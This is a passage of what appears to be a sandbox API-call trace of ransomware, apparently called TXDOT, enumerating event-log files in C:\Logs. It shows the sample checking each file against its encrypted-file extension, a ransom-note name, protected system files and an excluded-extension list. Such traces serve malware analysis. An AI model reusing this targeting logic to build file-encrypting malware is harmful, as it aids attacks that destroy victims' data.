psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.889] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-HotspotAuth%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" [0071.889] PathFindExtensionW (pszPath="Microsoft-Windows-HotspotAuth%4Operational.evtx") returned=".evtx" [0071.889] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2=" ransom ") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="debug.txt") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="boot.ini") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="ntldr") returned -1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.889] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.889] PathFindExtensionW (pszPath="Microsoft-Windows-HotspotAuth%4Operational.evtx") returned=".evtx" [0071.889] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.889] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.889] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.889] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.889] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.889] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.889] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.889] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cAlternateFileName="MI6B25~1.EVT")) returned 1 [0071.889] StrCmpW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2=".") returned 1 [0071.889] StrCmpW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="..") returned 1 [0071.890] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.890] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.890] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" [0071.890] PathFindExtensionW (pszPath="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned=".evtx" [0071.890] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2=" ransom ") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="debug.txt") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="boot.ini") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="ntldr") returned -1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.890] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.890] PathFindExtensionW (pszPath="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned=".evtx" [0071.890] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.890] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.890] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.890] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.890] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.890] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.890] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.890] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-International%4Operational.evtx", cAlternateFileName="MI854A~1.EVT")) returned 1 [0071.890] StrCmpW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2=".") returned 1 [0071.890] StrCmpW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="..") returned 1 [0071.891] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.891] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.891] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-International%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" [0071.891] PathFindExtensionW (pszPath="Microsoft-Windows-International%4Operational.evtx") returned=".evtx" [0071.891] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2=" ransom ") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="debug.txt") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="boot.ini") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="ntldr") returned -1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.891] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.891] PathFindExtensionW (pszPath="Microsoft-Windows-International%4Operational.evtx") returned=".evtx" [0071.891] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.891] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.891] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.891] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.891] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.891] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.891] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.891] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cAlternateFileName="MI32CE~1.EVT")) returned 1 [0071.891] StrCmpW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2=".") returned 1 [0071.891] StrCmpW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="..") returned 1 [0071.891] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.891] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.891] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" [0071.892] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned=".evtx" [0071.892] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2=" ransom ") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="debug.txt") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="boot.ini") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="ntldr") returned -1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.892] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.892] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned=".evtx" [0071.892] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.892] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.892] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.892] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.892] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.892] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.892] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.892] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cAlternateFileName="MIA934~1.EVT")) returned 1 [0071.892] StrCmpW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2=".") returned 1 [0071.892] StrCmpW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="..") returned 1 [0071.892] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.892] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.892] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" [0071.892] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned=".evtx" [0071.893] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2=" ransom ") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="debug.txt") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="boot.ini") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="ntldr") returned -1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.893] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.893] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned=".evtx" [0071.893] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.893] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.893] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.893] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.893] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.893] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.893] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.893] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cAlternateFileName="MIB32D~1.EVT")) returned 1 [0071.893] StrCmpW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2=".") returned 1 [0071.893] StrCmpW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="..") returned 1 [0071.893] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.893] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.893] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" [0071.893] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned=".evtx" [0071.893] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="bootsect.bak") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="iconcache.db") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="thumbs.db") returned -1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2=" ransomware ") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2=" ransom ") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="debug.txt") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="boot.ini") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="desktop.ini") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="autorun.inf") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="ntuser.dat") returned -1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="ntldr") returned -1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="ntdetect.com") returned -1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="bootfont.bin") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.894] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned=".evtx" [0071.894] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.894] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.894] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.894] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.894] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.894] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.894] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.894] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cAlternateFileName="MICA77~1.EVT")) returned 1 [0071.894] StrCmpW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2=".") returned 1 [0071.894] StrCmpW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="..") returned 1 [0071.894] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.894] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: 